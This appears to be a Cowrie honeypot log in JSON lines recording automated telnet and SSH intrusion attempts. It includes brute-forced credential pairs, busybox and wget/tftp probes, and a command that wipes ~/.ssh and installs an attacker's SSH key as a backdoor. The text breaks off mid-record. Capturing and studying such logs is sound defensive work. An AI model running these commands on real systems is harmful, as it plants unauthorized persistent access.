{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":4768,"dst_ip":"1.2.3.4","dst_port":23,"session":"fc02f091246b","protocol":"telnet","message":"New connection: 212.227.125.160:4768 (1.2.3.4:23) [session: fc02f091246b]","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.025989Z"}
{"eventid":"cowrie.login.success","username":"root","password":"realtek","message":"login attempt [root/realtek] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.358997Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:31:26.377361Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.475059Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.476959Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.477775Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.479035Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.479732Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.480152Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox UYHIC","message":"CMD: cat /proc/mounts; /bin/busybox UYHIC","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.578457Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox UYHIC","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox UYHIC","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.681250Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox UYHIC","message":"CMD: tftp; wget; /bin/busybox UYHIC","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.781582Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.882151Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.885000Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.command.input","input":"/bin/busybox UYHIC","message":"CMD: /bin/busybox UYHIC","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.983758Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.985976Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.987721Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.988666Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/70aa0660bd380e7bfe986adee62f3a96a0ae778a942f7080c4508932dad4da3b","size":3550,"shasum":"70aa0660bd380e7bfe986adee62f3a96a0ae778a942f7080c4508932dad4da3b","duplicate":false,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/70aa0660bd380e7bfe986adee62f3a96a0ae778a942f7080c4508932dad4da3b after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.990725Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.session.closed","duration":0.9696335792541504,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:31:26.995695Z","src_ip":"212.227.125.160","session":"fc02f091246b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43820,"dst_ip":"1.2.3.4","dst_port":22,"session":"07f6aae34d23","protocol":"ssh","message":"New connection: 212.227.235.229:43820 (1.2.3.4:22) [session: 07f6aae34d23]","sensor":"my-vps","timestamp":"2025-08-28T19:32:45.185070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:32:45.185979Z","src_ip":"212.227.235.229","session":"07f6aae34d23"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T19:32:45.289224Z","src_ip":"212.227.235.229","session":"07f6aae34d23"}
{"eventid":"cowrie.login.success","username":"root","password":"pfsense","message":"login attempt [root/pfsense] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:32:45.501495Z","src_ip":"212.227.235.229","session":"07f6aae34d23"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:32:45.607574Z","src_ip":"212.227.235.229","session":"07f6aae34d23"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":5764,"dst_ip":"1.2.3.4","dst_port":22,"session":"33d2ef538528","protocol":"ssh","message":"New connection: 80.94.95.15:5764 (1.2.3.4:22) [session: 33d2ef538528]","sensor":"my-vps","timestamp":"2025-08-28T19:34:39.949525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T19:34:39.951096Z","src_ip":"80.94.95.15","session":"33d2ef538528"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T19:34:40.002810Z","src_ip":"80.94.95.15","session":"33d2ef538528"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T19:34:40.639253Z","src_ip":"80.94.95.15","session":"33d2ef538528"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:34:41.693264Z","src_ip":"80.94.95.15","session":"33d2ef538528"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58662,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebbae1c8a557","protocol":"ssh","message":"New connection: 217.72.205.35:58662 (1.2.3.4:22) [session: ebbae1c8a557]","sensor":"my-vps","timestamp":"2025-08-28T19:35:00.641227Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:35:00.642401Z","src_ip":"217.72.205.35","session":"ebbae1c8a557"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33820,"dst_ip":"1.2.3.4","dst_port":22,"session":"65c52f84374f","protocol":"ssh","message":"New connection: 212.227.125.160:33820 (1.2.3.4:22) [session: 65c52f84374f]","sensor":"my-vps","timestamp":"2025-08-28T19:37:42.088645Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:37:42.090082Z","src_ip":"212.227.125.160","session":"65c52f84374f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T19:37:42.139187Z","src_ip":"212.227.125.160","session":"65c52f84374f"}
{"eventid":"cowrie.login.failed","username":"kafka","password":"kafka","message":"login attempt [kafka/kafka] failed","sensor":"my-vps","timestamp":"2025-08-28T19:37:42.288820Z","src_ip":"212.227.125.160","session":"65c52f84374f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:37:43.340307Z","src_ip":"212.227.125.160","session":"65c52f84374f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41630,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ec1cee1d364","protocol":"ssh","message":"New connection: 212.227.125.160:41630 (1.2.3.4:22) [session: 1ec1cee1d364]","sensor":"my-vps","timestamp":"2025-08-28T19:37:57.458710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T19:37:57.459643Z","src_ip":"212.227.125.160","session":"1ec1cee1d364"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T19:37:57.519335Z","src_ip":"212.227.125.160","session":"1ec1cee1d364"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27061992","message":"login attempt [admin/27061992] failed","sensor":"my-vps","timestamp":"2025-08-28T19:37:57.841915Z","src_ip":"212.227.125.160","session":"1ec1cee1d364"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27061986","message":"login attempt [admin/27061986] failed","sensor":"my-vps","timestamp":"2025-08-28T19:37:58.903739Z","src_ip":"212.227.125.160","session":"1ec1cee1d364"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27051982","message":"login attempt [admin/27051982] failed","sensor":"my-vps","timestamp":"2025-08-28T19:37:59.965966Z","src_ip":"212.227.125.160","session":"1ec1cee1d364"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27041982","message":"login attempt [admin/27041982] failed","sensor":"my-vps","timestamp":"2025-08-28T19:38:01.030560Z","src_ip":"212.227.125.160","session":"1ec1cee1d364"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27021983","message":"login attempt [admin/27021983] failed","sensor":"my-vps","timestamp":"2025-08-28T19:38:02.093176Z","src_ip":"212.227.125.160","session":"1ec1cee1d364"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:38:03.155336Z","src_ip":"212.227.125.160","session":"1ec1cee1d364"}
{"eventid":"cowrie.session.connect","src_ip":"147.45.65.11","src_port":36384,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec0c010865d7","protocol":"ssh","message":"New connection: 147.45.65.11:36384 (1.2.3.4:22) [session: ec0c010865d7]","sensor":"my-vps","timestamp":"2025-08-28T19:40:52.397734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T19:40:52.398970Z","src_ip":"147.45.65.11","session":"ec0c010865d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T19:40:52.416708Z","src_ip":"147.45.65.11","session":"ec0c010865d7"}
{"eventid":"cowrie.login.success","username":"root","password":"rootpassword","message":"login attempt [root/rootpassword] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:40:52.528543Z","src_ip":"147.45.65.11","session":"ec0c010865d7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:40:52.580715Z","src_ip":"147.45.65.11","session":"ec0c010865d7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T19:40:52.581515Z","src_ip":"147.45.65.11","session":"ec0c010865d7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T19:40:52.582919Z","src_ip":"147.45.65.11","session":"ec0c010865d7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:40:52.601869Z","src_ip":"147.45.65.11","session":"ec0c010865d7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:40:53.082148Z","src_ip":"147.45.65.11","session":"ec0c010865d7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T19:40:53.082856Z","src_ip":"147.45.65.11","session":"ec0c010865d7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T19:40:53.102027Z","src_ip":"147.45.65.11","session":"ec0c010865d7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:40:53.102832Z","src_ip":"147.45.65.11","session":"ec0c010865d7"}
{"eventid":"cowrie.session.connect","src_ip":"147.45.65.11","src_port":36396,"dst_ip":"1.2.3.4","dst_port":22,"session":"f45ce9379db9","protocol":"ssh","message":"New connection: 147.45.65.11:36396 (1.2.3.4:22) [session: f45ce9379db9]","sensor":"my-vps","timestamp":"2025-08-28T19:40:53.118868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T19:40:53.120033Z","src_ip":"147.45.65.11","session":"f45ce9379db9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T19:40:53.138158Z","src_ip":"147.45.65.11","session":"f45ce9379db9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T19:40:53.248243Z","src_ip":"147.45.65.11","session":"f45ce9379db9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:40:54.268394Z","src_ip":"147.45.65.11","session":"f45ce9379db9"}
{"eventid":"cowrie.session.connect","src_ip":"147.45.65.11","src_port":36406,"dst_ip":"1.2.3.4","dst_port":22,"session":"a691a5839392","protocol":"ssh","message":"New connection: 147.45.65.11:36406 (1.2.3.4:22) [session: a691a5839392]","sensor":"my-vps","timestamp":"2025-08-28T19:40:54.285273Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T19:40:54.285861Z","src_ip":"147.45.65.11","session":"a691a5839392"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@opens